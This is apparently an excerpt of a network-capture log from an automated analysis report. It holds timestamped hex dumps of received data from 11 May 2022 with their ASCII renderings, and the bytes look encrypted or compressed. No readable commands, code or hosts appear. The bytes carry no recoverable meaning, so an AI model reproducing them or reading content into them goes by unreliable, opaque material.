                                            Data Ascii: UT"h:UJ;8-/$<yI=?islrpn< %**Q,q<pNx%gt8_,n\OvfM@}~z-RFO(j,N~qO]uYe\'tL !]\9CyIU9((h"f5b"o0Dkprt
                                            2022-05-11 11:28:17 UTC21INData Raw: e3 97 0d 38 c9 e5 8c b2 17 ce 0d 85 b5 46 dc de 59 5e e3 e2 8f b3 46 b5 ad 16 f1 36 88 6e 14 8a 6c ce 1a 90 c7 b4 48 0d e1 89 ed 30 cd ed 9b f8 52 5d 79 77 97 4d 28 a4 d9 96 3e 8c 99 67 62 ec 21 fc 04 4f 60 af d8 b2 24 41 f5 24 d0 cb 66 cd d7 f3 0b f6 1a e6 dd 2b fd ae 43 ae e3 05 c7 0f 19 0c 1b e8 1b 52 f1 71 40 5b da 41 d1 33 c0 b8 8d e6 ea 83 53 a0 49 9b 58 4e da 81 60 11 cf 26 f7 ca 91 bd 03 36 23 b8 d8 5f e9 bb 49 4d 0c 57 25 22 d4 58 a2 f2 da d1 c9 84 65 08 7f 64 0e d4 b5 df e9 b8 8d 91 35 76 26 66 ca 2c 65 af 67 18 a4 ce 50 da 03 e8 ba 6e ae 10 4d 91 cf 29 21 2e 34 77 f6 07 96 db e6 f6 56 9b 5a d4 5c 62 e5 ba 05 ab d8 c7 da 75 7d b1 f8 a8 5e 67 ec f5 62 11 fb 25 17 ed 02 e6 ce 0b 78 bb b0 9a 34 cf 9b 74 bf c3 16 9c e6 79 1a e7 10 74 76 33 18 d3 b1
                                            Data Ascii: 8FY^F6nlH0R]ywM(>gb!O`$A$f+CRq@[A3SIXN`&6#_IMW%"Xed5v&f,egPnM)!.4wVZ\bu}^gb%x4tytv3
                                            2022-05-11 11:28:17 UTC23INData Raw: e8 2a b5 6a 5e 12 0a 2d f7 0b 9d 24 7e e5 f1 4f eb 94 5c 11 79 02 9c c5 ee 56 92 df 96 b9 35 6c f0 3e 16 ef 7f a8 f6 ff 77 81 43 88 89 b7 da 4f 74 78 0c 87 45 bc 3f b4 d3 d0 26 86 e4 2e 06 19 b9 7e 8c 53 ce 06 88 33 65 52 e9 bd d1 87 41 94 c6 7d 52 11 47 10 ad ff cd 10 29 f3 66 d8 f9 4e 66 e4 94 b0 8b 33 f8 62 97 df 28 6f c2 c2 97 8e 03 00 e2 f0 9d 59 69 73 65 9d 9e 47 96 1c 7f 27 88 dc 41 ef 85 4b a8 58 c7 7b 9a 17 4b fc dc 07 68 d4 fb 77 99 b9 5b 2c 38 a2 ab 42 b8 fa 33 fd a1 58 5c ec ea ed 53 4b 8a 52 ea ce 89 a7 df 2f 1e f2 d2 8c b7 44 85 94 b2 d1 31 70 e2 4d 1c bc 48 07 49 c2 38 bf 16 87 b8 d2 bc 25 5b 4a 92 96 15 aa 63 2c b2 fb 70 08 5f d2 ea 84 b5 fb 1a f6 63 8d 88 12 34 1c 2b b5 74 b5 ce fb ff 98 e5 38 00 73 31 a4 ae d8 18 f0 d2 49 68 76 36 cc 97
                                            Data Ascii: *j^-$~O\yV5l>wCOtxE?&.~S3eRA}RG)fNf3b(oYiseG'AKX{Khw[,8B3X\SKR/D1pMHI8%[Jc,p_c4+t8s1Ihv6
                                            2022-05-11 11:28:17 UTC24INData Raw: a6 fe ce bb db dc 57 5b f0 d8 5d f2 cc 52 47 73 5e 2f 56 c8 70 b8 f2 a7 9f e1 a7 61 22 3f e6 2f cb b4 db 3e ff fd b1 34 74 33 7c d8 34 1b ac 4d 52 a2 e4 24 fa 02 ee 98 65 cb 10 47 17 bb 60 21 2a ed 7a bb 05 f9 fb f8 80 6f 80 5f 94 5c 62 e5 ba 7f a9 d8 c7 d4 7c 7d b1 f2 3b 67 63 ec ba be 18 f8 1f 17 ef 0c 87 f1 2a 38 b3 b0 9a 30 ef 99 7b 41 c4 12 b5 e4 7a 38 44 18 74 7c 28 cb 34 b3 aa 0f bb 78 81 84 8b e0 ad 54 f3 eb 5e f4 68 47 16 73 0b 4a 8f 5c 3f e7 59 59 c7 8c da 5a 0c 5f 67 41 70 70 e5 29 0c a9 5f 44 81 b1 68 ad 7c 88 3f da a7 47 56 36 1c 5c b0 0b 20 1b c1 8f da b7 d1 c1 a2 49 45 64 65 80 ce fa 96 0d f6 e7 b5 02 4e 6a 53 66 5d 44 f0 75 b4 6b 0e 09 8c b0 cf 4b ab 53 25 7a fc 1c 3a c2 db 11 7a 1c e9 55 ac fb 4a 8b 3b b8 95 a0 92 31 3b 31 0e a8 fb ae 0d
                                            Data Ascii: W[]RGs^/Vpa"?/>4t3|4MR$eG`!*zo_\b|};gc*80{Az8Dt|(4xT^hGsJ\?YYZ_gApp)_Dh|?GV6\ IEdeNjSf]DukKS%z:zUJ;1;1
                                            2022-05-11 11:28:17 UTC25INData Raw: 29 f4 f9 77 ee 84 5f 49 51 c5 79 8c f8 4f b9 33 00 52 3f f2 08 67 a9 2f 31 10 b2 ab 6a 9f d2 25 f6 7f 9b 51 14 f1 f4 d4 63 a9 54 f5 cf 0d a0 e2 30 3a d7 ff a3 b7 44 a7 ae b3 d0 2b 58 f4 4d 1c b6 71 43 80 c2 34 13 1a 94 bf c9 9d 26 45 d6 93 ba 22 e2 66 2b 2f c2 74 08 5d bb 91 b0 b4 f1 38 e1 4a bb 83 37 13 76 3a a5 70 94 d3 0f b4 98 e5 3b 7c 6b 27 bb a1 56 14 8d ef 33 55 7c 3d cb 05 6a 8f 8a 57 2a 15 40 d4 30 da 51 e7 8b e4 45 0c 7e b8 9a 7e e8 3b f2 d5 57 47 12 ff 26 55 b6 5c 79 fd 8c 60 99 fe 0c a3 9f 64 e2 ef 6d 88 d2 47 b4 f6 5a 5c e8 74 48 e8 58 97 3a ec 98 ac f7 fe 52 4c 5e 39 64 75 8c 93 43 be ab d7 1b b2 90 1b 28 8e 79 3e c6 47 1d 6a 6b c7 57 95 6a a1 3d 35 09 2e 1c cd cd bf 33 1e c4 1b 1b 62 43 cd f6 74 5c fc 98 94 50 39 bc ab 1c dd 30 9e 6c 1e 52
                                            Data Ascii: )w_IQyO3R?g/1j%QcT0:D+XMqC4&E"f+/t]8J7v:p;|k'V3U|=jW*@0QE~~;WG&U\y`dmGZ\tHX:RL^9duC(y>GjkWj=5.3bCt\P90lR
                                            2022-05-11 11:28:17 UTC27INData Raw: b2 a2 19 6d 9b ad 8d 86 ca 0e 26 f3 e1 62 37 9a b8 e1 77 ff 58 a8 54 29 d5 cd a7 c6 a0 c8 47 04 41 e2 63 9f 71 c9 2c 03 b5 7e 73 8b b1 73 db 2c 76 3e f2 b7 4e 35 71 15 43 b3 79 70 37 d8 8d f8 88 c3 ca a8 5a 35 32 68 7e cb fe 9d 0e e7 e9 a4 75 4e 6a 59 7b 51 60 13 7d aa 9f 60 64 88 9b 53 3b e2 5e 25 78 fa ec 28 e5 df 2b fb 11 1b 54 88 e0 ac 99 1c 93 87 83 a2 ce 3a 17 2d b7 eb a5 0d ca 27 3c 78 ba fa 49 3d c4 d9 3f 25 a5 af 69 ec 59 96 cd 0e 6d 72 65 70 b7 d9 e0 6e a5 3c 20 d4 25 26 2a 51 e4 a3 d5 e8 da ae 12 1d 3c 78 59 1e 9f e9 34 81 98 15 35 44 a2 7f 0d 24 6f c6 c8 da 8c e8 2f 06 15 cd 01 5b 90 0e cb 7e dc 25 00 94 5a aa 8e a5 8a f8 71 c3 8d 65 51 4c bd 10 96 8b 38 b4 60 5e 7f 13 2d fe 15 e3 11 52 e3 f3 6d 71 be 52 2c 7d 0b 34 3a ef 7a a3 c9 9a b2 2e 7f
                                            Data Ascii: m&b7wXT)GAcq,~ss,v>N5qCyp7Z52h~uNjY{Q`}`dS;^%x(+T:-'<xI=?%iYmrepn< %&*Q<xY45D$o/[~%ZqeQL8`^-RmqR,}4:z.
                                            2022-05-11 11:28:17 UTC28INData Raw: 21 5b 87 87 29 72 cf da da f2 fb 52 f8 bd 16 43 27 fb 08 9a be d7 6a 68 df 8f 57 20 08 27 5c ac a8 a6 c5 ad 63 9e e3 01 a9 9a 51 e6 ef 41 87 d0 6c e7 b9 5a 56 32 6a 43 c2 51 8d c5 fd b4 a6 f4 d6 b3 4c 12 7f 48 89 8a 9e 43 b6 ae 19 19 9e b6 13 2a f3 2b 3e c6 52 00 60 4e fe 5f 82 9e a5 06 e1 8b 28 1b c0 f3 78 33 32 cc 1a 8c 68 94 c0 d7 a7 5d d0 90 97 af 00 d6 52 e9 0a 16 b4 6c 07 bc 46 ed b6 90 cd 34 0a 0d e1 9c 26 81 f6 73 9b fa 4d 2c 42 73 17 45 04 ad da bc 54 c0 99 61 4e d1 2d fc 06 d6 97 ae f4 bc fa f6 17 24 d0 c3 55 a2 fe e6 75 f7 00 18 d8 2f e8 ab 3d 9a cb 26 cd 72 5c 8c 12 ec 00 5a 2c f8 5f a5 db 6f c7 47 f0 dc bc ef ea 87 4a 84 50 91 4f b6 f3 8e 62 09 c9 a6 f6 d4 6f b8 f2 5f 27 a0 a5 0f f6 cf 7e 4b 7b 52 25 2a c8 8e b9 dc d2 a4 64 a7 65 0e 7e fd 0b
                                            Data Ascii: ![)rRC'jhW '\cQAlZV2jCQLHC*+>R`N_(x32h]RlF4&sM,BsETaN-$Uu/=&r\Z,_oGJPObo_'~K{R%*de~
                                            2022-05-11 11:28:17 UTC29INData Raw: da d0 33 2f 7b 41 fb 74 3a f0 c8 f9 db 74 5f 94 95 3d 96 de 3a 00 08 e5 70 bd c6 b0 7d a0 2d 27 dc 02 42 d4 50 c8 b9 de f4 26 d4 6e 0a 3a 74 4d c6 6f 3f 5a 0e 9c 14 f9 2a 3f 75 25 68 71 d6 d1 f3 dd e5 27 1b e2 db d3 4e aa 0e a8 3f dc 2c 1e 05 31 87 8a 84 dc 39 6f c7 88 63 bc 48 91 09 bb df 2a 4a 6b 78 69 1c 56 a4 09 1d 14 44 fc f4 65 eb 8b 5b 32 78 02 3c c1 f1 46 59 de ba a1 1b f8 f7 06 87 f1 6e bb f3 ee 61 9b 52 7f 76 9a ce 4e 70 06 45 0b 54 b8 50 e9 bd c4 2d 8b f1 0c 00 1d b9 65 ac 69 35 21 b5 34 56 4b 95 ac c0 82 5c e9 29 7c 7e 1b 5c 02 69 f6 a9 20 3a f6 62 4d 93 0d 6b 1a 93 83 8d 28 ee 66 b7 1e 2b 9f d0 eb 9e e1 35 1e 1c f5 bc 42 51 99 7a 85 8a 5d 9f f3 7b 14 94 1a 76 c2 8a 49 cc 1c d4 7c 9e 69 d2 e6 22 0c 5b d7 e0 52 99 a9 5e 36 ee b3 86 47 a4 d9 3e
                                            Data Ascii: 3/{At:t_=:p}-'BP&n:tMo?Z*?u%hq'N?,19ocH*JkxiVDe[2x<FYnaRvNpETP-ei5!4VK\)|~\i :bMk(f+5BQz]{vI|i"[R^6G>
                                            2022-05-11 11:28:18 UTC30INData Raw: e2 64 bd 51 93 c9 5e 6f 0f f7 a7 33 f6 97 ed 9b fe 5b 1f 43 6c 92 0a 28 a4 d9 b3 02 95 9a 1a 13 cf 21 f8 10 fc 79 ad a3 f8 f9 de f2 32 c7 ba 0a be e4 e0 78 d4 18 f0 f3 23 1a 53 43 a8 46 09 c7 0f 12 86 10 93 55 56 2c f4 40 20 84 43 ce 44 e5 ce 81 ee ea 89 71 8b 2b c2 58 48 f6 a9 4b 37 cc a0 e8 cd 97 37 69 3f 08 cc d9 5d fc 78 15 69 73 5e 2f 31 d5 74 be e6 cb d2 8e d3 65 08 7f e3 16 d1 0d b5 ee f6 89 87 5f 44 ec 17 96 4f 1b a6 6d 1b db bf 4b d8 07 f0 a1 4b a7 7f d9 11 c6 23 36 00 e9 4b c5 04 96 f6 f9 80 65 d4 24 dd 4d 11 55 92 19 a3 d4 c3 f1 5e 12 24 f2 28 51 4b e0 f5 b7 77 b0 25 17 e5 4c 86 f6 cc 17 b6 a4 cb 26 ec 58 7c b7 e9 38 b7 89 24 10 67 13 a8 71 1d c5 39 a3 a2 13 47 79 ab 8d 91 c1 c2 2c f3 eb 58 e9 7f 77 1b 68 f3 4a a3 54 6f de d3 48 c5 dc bd 18 0c
                                            Data Ascii: dQ^o3[Cl(!y2x#SCFUV,@ CDq+XHK77i?]xis^/1te_DOmKK#6Ke$MU^$(QKw%L&X|8$gq9Gy,XwhJToH
                                            2022-05-11 11:28:18 UTC32INData Raw: 53 eb 04 fc a0 7f a8 f2 ed 0b c7 4d 76 8c b3 9e 5f 72 77 1d 13 3b c8 3f b6 b6 db 37 95 e8 06 02 1e a6 79 57 7f e7 26 8f 3a 51 56 83 aa d1 96 45 f9 29 7c 7e 1a 2a 40 bf fa b2 26 34 e0 64 5c 87 14 79 ee 6c ae a8 2c fc 19 e3 d8 34 95 ef 36 81 fb 23 06 e2 e5 96 52 84 75 49 8f 8e 4b 99 e2 6f 0d 9e f3 89 ef a9 49 9c 57 ec f0 67 f9 b3 cc 22 06 44 d2 c3 53 99 0a 58 2c 10 e8 aa 42 a3 c4 36 fa 99 f6 72 27 f1 fe 45 4d 84 46 0b c4 5b 84 f1 4d 58 d2 d7 89 b5 47 d6 df b3 d1 3f 37 68 4c 1c b0 59 8b 48 c2 32 b6 00 fb cb d2 ad 28 5a a0 80 bc 22 b2 60 34 20 14 71 24 49 bf 85 cb b5 f1 36 e5 74 8b 0c 80 76 6d 0d a4 7a 81 db 91 e8 98 f4 3c 6e 79 cf a5 80 e9 1f 99 99 32 55 72 34 cb 68 06 87 8d 50 52 53 da de e8 de 29 f0 a4 e2 54 11 9f 7b 99 a8 f5 fe 74 cc 8f 5b 2b 03 38 5a 4e
                                            Data Ascii: SMv_rw;?7yW&:QVE)|~*@&4d\yl,46#RuIKoIWg"DSX,B6r'EMF[MXG?7hLYH2(Z"`4 q$I6tvmz<ny2Ur4hPRS)T{t[+8ZN
                                            2022-05-11 11:28:18 UTC33INData Raw: 10 f4 4a db 34 fd 12 98 2d 54 c6 13 f9 35 87 af 7e 38 5f e6 4b d8 9f e7 88 6d 51 10 47 11 5a 20 3a 0a 16 50 f5 07 0a d0 e5 a0 9a 82 24 dd c0 6b fc b2 e6 a9 d8 c1 6e 5f 63 91 0d 28 57 67 70 f8 a0 11 d8 da 17 ef 1d 0d f4 0d 0c 92 4f 9a 30 e7 1a 7f a0 ce 1e 40 e6 79 10 fb 10 62 69 3b aa 4c b3 a2 19 5a 60 be 89 8c f3 c6 3c 0d ea 74 c3 66 3c 50 68 f5 4f b9 d9 17 de d3 58 ca 85 d0 49 5c cb 71 5c 91 3a 55 2f 16 b6 eb 69 99 ad fe d9 23 92 50 aa b8 4c 50 2d 07 47 b9 e4 25 28 cf 72 f3 be eb c3 d3 05 3e 2d 61 9e 47 fd 80 0c f7 e0 85 80 51 3a cf 70 40 57 bb e1 a3 8d 14 b9 80 82 45 c8 ab 45 33 ee ec f9 2d 72 d6 26 e6 9a ec 48 b2 7f bd 9c 09 fc e2 88 b4 3a 24 23 3d a4 f8 bf 09 c4 39 dd 69 68 f1 1b 6a ef dc 03 d6 47 46 85 ea 73 87 da 21 79 8c e4 5c a6 d1 a7 15 ea 2d 36
                                            Data Ascii: J4-T5~8_KmQGZ :P$kn_c(WgpO0@ybi;LZ`<tf<PhOXI\q\:U/i#PLP-G%(r>-aGQ:p@WEE3-r&H:$#=9ihjGFs!y\-6
                                            2022-05-11 11:28:18 UTC34INData Raw: cb 69 be dc af 07 df da 2b d2 b2 37 bf e4 ee 73 90 64 e7 d9 09 ff bf 47 a8 da 22 df f1 12 a0 1d ea 60 18 2c f0 47 34 a5 42 ce 4a f9 b8 e0 eb ea 92 53 97 5d 67 59 64 e5 a0 1b 5f c5 a6 fa ce b9 c4 df 55 2a ae c6 32 82 cf 7a 5e 6d 50 36 26 d0 61 bc e6 24 d6 cd a4 72 1b 71 e4 16 d0 aa c0 ca fc a2 93 1e 71 01 23 05 ca e4 8c 67 18 a0 f5 7b dd 03 a2 91 4d ae 4d 47 11 d7 3f 32 22 d1 6e f6 07 96 d9 e8 88 7a 8f da dc 70 6a e6 84 28 a4 c7 cf e1 5e 7d a0 fa 37 43 99 ed dd b5 1f fe ab a0 c1 3c 8e e8 01 0e b2 a1 92 2f eb 78 77 93 ce 2f ba e1 c1 c7 74 1c 6b 7b 24 cd 38 a2 aa 0c 4e 87 ac a1 9c e6 c4 30 f5 65 ef 86 59 46 1e 62 fe 54 af 47 30 de c2 51 d8 9a 38 57 20 46 7b 1b f5 28 c9 26 0a b4 37 74 82 b1 62 cf 22 9b 37 de a9 44 45 25 ea 42 95 f8 30 31 c9 8b b1 08 d1 c1 a8
                                            Data Ascii: i+7sdG"`,G4BJS]gYd_U*2z^mP6&a$rqq#g{MMG?2"nzpj(^}7C</xw/tk{$8N0eYFbTG0Q8W F{(&7tb"7DE%B01
                                            2022-05-11 11:28:18 UTC35INData Raw: 7f e7 2c 9a 28 45 3c 8f b3 8e 03 4f f9 c4 75 52 02 5c 0a b6 04 b7 01 21 f5 74 72 3a 0d 6c f7 9a af 95 28 e7 9c 87 f4 24 92 dc f7 fa d0 8c 07 e2 f4 47 c0 69 73 7c 9f 91 58 8e ea 64 f5 80 c8 7b ed 9a 5b d3 4d cb 23 1e 0c 57 f5 2a 06 55 c9 e5 a9 98 94 58 3b 03 ba aa 53 ba cd 2b 02 a0 7e 73 0c f4 c6 b7 b5 64 aa e4 c0 5d b5 c3 35 16 6f d6 8d b7 1b ad 84 a2 c7 37 60 5b 4d 1c b6 71 f8 55 3c 39 8c 0b 8b a7 fa d1 23 45 be 95 a5 28 cc 94 2b 3e e0 6d 04 5d b5 e1 8e 4b f0 1e f1 7d ad aa 4b 18 19 07 a2 6f b8 ab 70 ee 98 ef 25 7d 6e 31 ac b7 35 1c ce d8 25 7d 0a 37 c8 19 5d 99 e2 a6 3d cf d0 c2 e2 f6 5a ee ad 16 43 27 e6 0c e2 f5 ff e1 6c f7 f4 5a 3a 0f 21 4a ac 39 55 e9 a9 42 ab f4 00 a9 9b 53 16 10 6c a2 c3 6c e6 97 5a 56 32 5c c6 c3 58 9d 13 81 99 ac fd f8 4d 7c 7d
                                            Data Ascii: ,(E<OuR\!tr:l($Gis|Xd{[M#W*UX;S+~sd]5o7`[MqU<9#E(+>m]K}Kop%}n15%}7]=ZC'lZ:!J9UBSllZV2\XM|}
                                            2022-05-11 11:28:18 UTC36INData Raw: f6 7c ca d9 f9 84 0a 1e 24 dd 5a 4a 9a 93 19 a3 ce db 9d 22 7d b1 f8 36 5c 67 eb e9 41 19 d4 2b 15 94 53 91 fd 16 69 ed b1 9a 3a ed 9f 7d bf c2 20 41 e7 55 31 65 62 3a 76 37 c1 3a b0 d9 48 45 79 a9 e2 10 e2 c2 20 db 90 59 e9 6e 51 04 07 81 4b a3 5e 27 d7 d8 59 c0 97 38 57 20 40 7a 30 c0 71 c9 22 0d d1 2a 60 80 b5 7d de 5f 5e 50 a0 b9 4c 50 2a 1f 43 be ea 28 c9 d9 a0 fd 90 ab 8f a8 4b 3a 2b 0a fe cb d2 8a 13 fc e6 8c 91 59 94 52 55 55 50 fb 7d ad 8f f1 24 a5 81 5b 2f ec 5f 25 76 e6 99 62 ee df 3e d8 7a e4 55 ae f5 ac e5 63 93 96 82 af 3b 3b 3c 32 5e f9 82 17 d9 57 6d 68 44 ff 66 44 8f dc 07 de 70 2b 97 ee 79 80 c4 51 1b 72 e5 7a aa d2 a5 69 b3 d3 37 f5 1f 5a 21 51 e3 bc d6 0d 25 83 3c 21 3f 48 24 8f 28 17 1e 8b 9a 7a 6f 75 a6 75 a8 6e 6e c6 a0 f6 dd e5 34
                                            Data Ascii: |$ZJ"}6\gA+Si:} AU1eb:v7:HEy YnQK^'Y8W @z0q"*`}_^PLP*C(K:+YRUUP}$[/_%vb>zUc;;<2^WmhDfDp+yQrzi7Z!Q%<!?H$(zouunn4
                                            2022-05-11 11:28:18 UTC37INData Raw: 49 c6 3d b6 18 ef 09 d2 ad 26 47 cf 24 ba 22 a7 4e be 3f ea 7a 0a 58 33 49 f8 0c f1 32 e7 60 8f f9 8e 19 19 09 8c e4 9f c4 88 93 20 e5 3a 75 48 31 a4 bf fb 1f e2 97 33 55 76 53 c8 13 4a 91 9e 50 05 fd db de ee f6 43 f5 bb e5 bc 0a dc 00 9b d3 47 e1 68 db a1 cd 3b 05 2d 4a be 45 a3 e9 b8 4c ae 00 0d 85 9d 4e 63 5c 6d 8e dc 47 0c f7 5a 5c 2d 67 4a c2 49 93 25 02 99 80 e2 fc 29 f8 12 75 60 1f 80 92 43 b5 98 fd 19 b2 b6 17 37 87 75 3a c6 47 1b 76 4f 00 57 b9 6a ad 13 3e 93 25 1b d6 e8 95 36 1e df 09 9d 96 9c f3 d8 5e 70 31 8f af ae 38 ad a9 0f 0b 1f b2 65 12 b5 3a ed 1a 90 d7 27 45 0d f0 89 2d 73 cf c1 95 f8 36 9a 4a 6e ed 6c be a5 dd b4 37 9d 9d 61 5b cb 36 02 0f e3 6a b7 cb b2 f9 cf f2 3b db 37 78 93 f1 e8 0e 47 1a e6 dd 7d f4 ad 43 a2 e3 3c c6 0f 19 81 0d
                                            Data Ascii: I=&G$"N?zX3I2` :uH13UvSJPCGh;-JELNc\mGZ\-gJI%)u`C7u:GvOWj>%6^p18e:'E-s6Jnl7a[6j;7xG}C<
                                            2022-05-11 11:28:18 UTC39INData Raw: aa 4b 3e ad 6f 5d e5 d3 80 0c dd fc 84 81 df 7c 7d 72 77 4a f0 7d 2a 9f d2 39 88 9b 59 5a a6 73 0c 71 cd 33 3b ee d9 23 c3 26 eb 51 a7 8c 6d 8a 17 95 85 8c a5 34 16 3c 34 aa 25 54 0d db 2c 32 6c 2b ee 65 3f e5 22 0c db 58 52 81 ed 5b 47 de 3e 69 71 e1 58 61 d9 a5 68 ca f5 36 d9 17 6b 28 59 8b 79 dc f3 2e a2 37 14 15 7b e3 74 d7 e8 b4 81 47 b9 7c 45 a2 7d 33 ff 75 e8 c9 d6 d8 f4 22 86 16 07 4d 5a bc 0c db 64 4d 32 2b 61 7b 83 8a 8e 4b e9 a1 62 84 7d af 45 86 89 a8 ee 30 bc 7d c5 6c c3 bf f7 09 1d 18 66 74 e3 4b e0 b4 4a 21 7d 82 27 19 6f 56 a7 df 9e b1 b2 68 d9 12 8f f7 ee b1 d8 e0 78 87 dc 6c a6 93 c2 5b 72 7d 8b 01 8a db 37 af 2d cf 20 91 dd 0b 1a 07 b3 5a 84 5e ce 20 99 b7 44 86 c2 ab cb b4 4e ec c8 6b 7c 0f 74 10 bf fa 36 27 f7 b2 6a 46 07 01 63 ed 8f
                                            Data Ascii: K>o]|}rwJ}*9YZsq3;#&Qm4<4%T,2l+e?"XR[G>iqXah6k(Yy.7{tG|E}3u"MZdM2+a{Kb}E0}lftKJ!}'oVhxl[r}7- Z^ DNk|t6'jFc
                                            2022-05-11 11:28:18 UTC40INData Raw: 3e 77 73 6a 91 94 5b 41 b1 cb 1a 99 be 30 cb 98 4c 3e d5 66 1d 69 6b fe 56 95 66 a4 2a f2 85 2e 30 d2 e5 81 25 e0 cf 21 83 70 96 df d9 4f a2 fd be be bd 33 bc aa 0e 0b 1f b2 6e 3f 8e 6f 0e 18 eb 0a 34 41 09 cb af 32 8e b3 2a 9b fa 49 06 4a 6e e9 57 18 a6 dd 96 29 8e 99 10 4a cf 30 ea 05 e4 72 af df a1 07 df da 26 c8 c2 79 b8 f2 14 74 d3 18 f1 d2 03 e2 b4 bd a9 e7 24 ec 0d 38 6f 10 93 d3 56 2c f4 69 79 d8 40 b3 88 f3 a1 f7 c5 ea 83 57 9b 60 9c 58 52 f2 a2 60 63 c5 a6 ef c8 86 34 f0 55 20 ba d2 5b e0 cc 7e 27 9f 5e 25 24 72 76 bd d8 3e d7 e1 a1 4f 08 75 f7 37 d3 b5 c5 34 fd 8e e3 35 74 28 11 ee b8 35 a6 67 1a aa e0 5d db 07 eb 9c 49 dd fe 47 11 c0 8b 27 24 ec 78 11 07 96 df d3 80 65 91 14 de 5c dc e1 92 19 a9 d8 c1 f2 54 55 a6 f2 28 5d 65 fa 8c 73 18 f8 21
                                            Data Ascii: >wsj[A0L>fikVf*.0%!pO3n?o4A2*IJnW)J0r&yt$8oV,iy@W`XR`c4U [~'^%$rv>Ou745t(5g]IG'$xe\TU(]es!
                                            2022-05-11 11:28:18 UTC41INData Raw: 22 06 08 da ff 5a 9f 0e d3 73 eb 2e 1a 6a 75 86 8a 8e d6 e3 7c c2 86 7d af 4d 85 18 be c0 68 b6 6a 54 03 1c 2d f7 15 1d 10 7e e5 f5 65 eb 8f 7f 29 7d 04 29 c4 ee 23 a7 df 87 ab 37 2e f3 13 d3 eb 6b f9 f8 ea 66 cc 43 73 9c ca f6 55 70 6f 0a 05 52 94 d7 b6 bc c2 0a 84 f8 2c 60 4f b9 74 a3 74 cc 37 14 6d 4e 58 91 bf c2 96 50 f3 c8 77 cf 02 47 7a 87 fb b6 27 3a e6 74 4f 82 39 2f f5 87 be 90 ba ec 64 97 de 23 1c 99 ee 9e f1 23 16 f3 e2 86 5b 77 e9 74 9a f6 f7 9e e2 74 64 86 e5 77 e4 93 7a aa 54 c5 7a 8d 8b 16 e6 22 07 57 d6 e2 40 8f a7 56 b1 01 a5 c5 ed b3 d2 2f 93 fa 52 71 2d e0 ea 43 9d 88 41 e4 d1 66 b3 7d 81 24 7d d1 9b d8 f4 ac 84 b9 c6 b6 02 f4 4c 1d a5 66 e1 5e d4 27 80 87 85 a8 bd 95 23 45 be 80 be 33 a7 e8 9c 27 c4 63 0a 7d bd fe 85 35 d9 c7 e1 62 8b
                                            Data Ascii: "Zs.ju|}MhjT-~e)})#7.kfCsUpoR,`Ott7mNXPwGz':tO9/d##[wttdwzTz"W@V/Rq-CAf}$}Lf^'#E3'c}5b
                                            2022-05-11 11:28:18 UTC43INData Raw: 32 e8 3b 56 2c 7d 6c 5b da 42 c5 5b e0 aa f3 fe e1 95 a9 89 7c 9a 4f 5b f9 a2 71 1a da ad 00 cb bd bb f5 50 18 9d 27 a2 09 de 7e 45 74 88 36 26 d8 61 be 2a d6 d0 95 ab 65 08 6e f2 0e cd 6f f3 8e fc 8e 9b 24 70 2b 13 d1 fa 1b a6 61 21 fa 19 b4 27 00 c6 31 4d ae 1a 40 65 ca 29 21 31 ff 56 9a de 96 d9 f3 d1 74 86 22 e6 48 63 e1 92 08 ad de 1b e1 51 79 a0 f5 3f 8d 70 3a 7c 90 18 f8 24 46 fb cd 13 fd 12 07 9a a4 9a 30 ed ae 23 bd c5 38 a4 6b 7e 10 67 18 67 7e 26 cd 2e b4 8a 02 45 79 a7 2f 9d ea d5 20 7f ba 58 e9 65 e5 0f 60 ed 4f f3 f6 29 d6 ca 4f 4b dd c6 56 0d f5 69 43 94 60 ce aa 5f aa 77 61 22 a0 6a c3 3c 99 36 ca ac 57 d7 64 14 43 b8 e6 2b 26 d2 9a e5 0e c1 cb bf 5c a2 3c 6f 98 dd 4e 91 06 ef fb 10 87 44 70 44 e5 46 42 e7 55 36 95 0f 2f af 8a 53 42 32 73
                                            Data Ascii: 2;V,}l[B[|O[qP'~Et6&a*eno$p+a!'1M@e)!1Vt"HcQy?p:|$F0#8k~gg~&.Ey/ Xe`O)OKViC`_wa"j<6WdC+&\<oNDpDFBU6/SB2s
                                            2022-05-11 11:28:18 UTC44INData Raw: 92 af 80 0c 40 7b 95 de 34 80 c5 f1 94 0e 31 2c ed f6 eb 90 7a 74 61 a4 4b 58 9f e4 61 00 92 e2 77 ff 83 54 ba ac d5 50 95 04 37 35 22 06 40 e9 20 57 99 be 44 22 03 b4 aa 53 b4 cd 33 02 a0 7e 7a 25 e5 83 82 4b 9b 51 ea d2 64 a0 f3 27 10 cb 29 8c 9b 40 87 9e a0 d7 3b 49 f2 5b e2 b7 5d f3 51 d1 3e a0 0b 92 a0 de 53 23 69 bb 91 c1 f0 a3 66 2f 16 39 70 08 5b a2 f3 96 b3 f1 23 e5 7d 84 7c 36 35 12 0f b0 0d 44 c4 82 ea 87 ef 29 77 62 20 a2 ba 35 1c ce d4 25 46 70 36 d9 15 44 90 73 55 11 cd f1 db d6 da ac 0e 5b c2 42 0b f0 14 a9 ad ff 14 68 df 89 5b 3a 05 27 57 cb 8a a7 e9 ad 64 bf fc 63 59 93 4c 1e 33 8c 8e d8 6f 98 8d 8d 56 36 70 62 eb 5a 81 46 2b 98 ac f3 fc 47 31 cb 75 64 65 93 e8 97 bf b0 e3 1a c9 6e 1b 28 8a 09 fe c7 56 15 50 dd fe 56 95 bd 14 2a e3 93 27
                                            Data Ascii: @{41,ztaKXawTP75"@ WD"S3~z%KQd')@;I[]Q>S#if/9p[#}|65D)wb 5%Fp6DsU[Bh[:'WdcYL3oV6pbZF+G1uden(VPV*'
                                            2022-05-11 11:28:18 UTC45INData Raw: 27 06 e4 35 59 fc 12 0c a1 b6 85 1f f4 9d 76 ae de 21 87 18 78 3c 60 08 6e 7d 28 fc 2b a8 a2 02 5e 6e 53 8c a0 e1 da 35 e8 eb 49 f2 7b 72 e0 69 d9 4c b2 4d 33 c1 e5 4a dc 8c d7 4d 13 4a 86 4a a2 7a d8 2d 1f ba a1 73 8b ae 7c c3 2e 88 2e c5 a7 7c a4 37 38 52 a8 f3 36 ed cf 5a 7f bd d0 c1 a9 58 3b 32 54 93 d1 d2 91 17 e9 cb 72 97 62 64 51 68 5c 60 38 7c aa 9f 1c 30 96 bc 4a 4f a2 4e 3e 6d c6 1c 3a c2 d5 2b fb 1c 33 46 af fc 90 99 0c 93 87 93 ab 0b c5 3a 02 ab fe a9 62 e4 2d 23 6e 5b c7 76 24 ef cd 1c c5 42 ae 97 c2 7d 94 cf 35 47 ba e4 70 bd ca b5 71 be 3e 2d d9 0c 56 35 5f 1a a2 f0 f9 35 a4 24 dc 29 7b dc 7e c4 f3 34 9a 81 65 45 